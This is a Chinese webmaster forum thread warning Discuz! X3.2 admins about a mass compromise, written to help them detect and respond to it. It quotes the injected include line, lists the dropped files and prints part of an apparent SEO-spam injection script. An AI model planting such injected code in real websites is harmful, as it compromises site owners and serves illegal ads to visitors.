批量DZ站被挂马，请各位站长检查下后台

批量DZ站被挂马，请各位站长检查下,后台-工具-文件校验,看看那些是被改动的PHP文件检查下
有没有被挂马
我在自己站的感染文件里有其他DZ站的网址，联系了以后发现果然如此，我联系到2个站长了，都DZ3.2
开始怀疑插件，但另外一个站长，被黑6月1日重装了，还没第3方插件只官方的QQ互联，只装了第3方手机模板，仍然再次被黑。
漏洞并不在被感染的文件，现在怀疑UCenter,Discuz uc.key泄露导致代码注入漏洞，因为DZ3.2到2016年6月1日就不更新了。但是最后更新Discuz! X3.2 R20160601里 uc.php漏洞已经修复了。
怕memcache+ssrf GETSHELL漏洞漏洞现在停了memcache，没用。
总之还找不到头绪，希望各位站长检查下自己的网站，群策群力，给给建议。

一般是感染了 source/class/class_core.php 或config/config_global.php 或其他核心PHP文件加了一句话 include_once 引用了 /某目录/某目录/0.txt
内容就这一句

1. @include_once("你的某个可写目录/0.txt");

复制代码

文件目录都是变的，但是代码不变，最有可能是 /data/avatar
建立了以下文件，
/某目录/某目录/0.txt
/某目录/某目录/1.jpg
/某目录/某目录/2.jpg
/某目录/某目录/3.jpg
/某目录/某目录/4.jpg
/某目录/某目录/work/zi_1.txt
/某目录/某目录/work/zi_2.txt
/某目录/某目录/work/zi_3.txt
/某目录/某目录/work/zi_4.txt
/某目录/某目录/work/zi_5.txt
/某目录/某目录/work/zi_6.txt
/某目录/某目录/work/zi_7.txt
/某目录/某目录/work/zi_8.txt
你删除没用，大约半小时他重新给你下马

1.jpg 等是文本文件，有PHP广告内容，有其他网站的内容
/work/目录下都是广告标题文字，基本是违法的广告

0.txt 开头内容如下

1. <?php
   
2. 
   
3. ini_set('html_errors', false);
   
4. ini_set('display_errors', false);
   
5. define("APP_INCLUDE_FLAG", "TRUE");
   
6. define('APP_JACK_CHARSET', 'GBK');
   
7. define('APP_JACK_DOCUMENTROOT','/0.txt所在目录/');
   
8. define('APP_JACK_TEMPLATE', APP_JACK_DOCUMENTROOT . '2.jpg');
   
9. define('APP_JACK_ARTICLE', APP_JACK_DOCUMENTROOT . '3.jpg');
   
10. define('APP_JACK_DES', APP_JACK_DOCUMENTROOT . 'miaoshu.txt');
    
11. define('APP_JACK_BIANLIANG', APP_JACK_DOCUMENTROOT . '4.jpg');
    
12. define('APP_JACK_BIANLIANG_B', APP_JACK_DOCUMENTROOT . 'bianliang2.txt');
    
13. define('APP_JACK_BIANLIANG_C', APP_JACK_DOCUMENTROOT . 'bianliang3.txt');
    
14. define('APP_MIX_KWD_FILE', APP_JACK_DOCUMENTROOT . 'hunhe.txt');
    
15. define('APP_JACK_CACHED', 'Uncached');
    
16. define('APP_JACK_MIN_PAR', '3');
    
17. define('APP_JACK_MAX_PAR', '3');
    
18. define('APP_JACK_MIN', '10');
    
19. define('APP_JACK_MAX', '15');
    
20. define('APP_JACK_OPENWL', '1');
    
21. define('APP_JACK_APPFILE', APP_JACK_DOCUMENTROOT . '1.jpg');
    
22. function App_GetLink()
    
23. {
    
24. $site = array();
    
25. $site[] = 'http://你或别人的网址/thread-' . mt_rand(1000, 999999999) . '-1-1.html';
    
26. $site[] = 'http://你或别人的网址/forum-' . mt_rand(1000, 999999999) . '-1.html';
    
27. $site[] = 'http://你或别人的网址/forum.php?mid=' . mt_rand(1000, 999999999) . '/';
    
28. $site[] = 'http://你或别人的网址/home.php?mid=' . mt_rand(1000, 999999999) . '/';
    
29. $site[] = 'http://你或别人的网址/index.php?' . mt_rand(1000, 999999999) . '/';
    
30. return $site[mt_rand(0, count($site) - 1)];
    
31. }
    
32. function App_GetSelf()
    
33. {
    
34. $site = array();
    
35. $site[] = 'http://你或别人的网址/thread-' . mt_rand(1000, 999999999) . '-1-1.html';
    
36. $site[] = 'http://你或别人的网址/forum-' . mt_rand(1000, 999999999) . '-1.html';
    
37. $site[] = 'http://你或别人的网址/forum.php?mid=' . mt_rand(1000, 999999999) . '/';
    
38. $site[] = 'http://你或别人的网址/home.php?mid=' . mt_rand(1000, 999999999) . '/';
    
39. $site[] = 'http://你或别人的网址/index.php?' . mt_rand(1000, 999999999) . '/';
    
40. return $site[mt_rand(0, count($site) - 1)];
    
41. }
    
42. function getImg()

复制代码

另外，有任意名字的php文件后门，大家可以搜下里面关键词maxfile ，2000000 等看看有没有中枪

https://discuz.dismall.com/forum.php?mod=viewthread&tid=3816560
http://115.com/1000018516/T1234473.html

这2个网址说明了，和我的情况类似


用 360 的 www.so.com 搜下娱乐场 bbs六合彩 bbs

几乎都是被挂马的论坛、
而这些站长还浑然不觉

如此多的DZ站被黑，难道不是DZ有未爆出的0day 漏洞吗？
乌云站走了，我们哪里去找这些漏洞？

做好服务器安全吧！

如此多的DZ站被黑，难道不是DZ有未爆出的0day 漏洞吗？
乌云站走了，我们哪里去找这些漏洞？

不做好服务器安全工作，被挂马属咎由自取的说

到底是什么漏洞

肯定是uc.key导致的，我也被挂马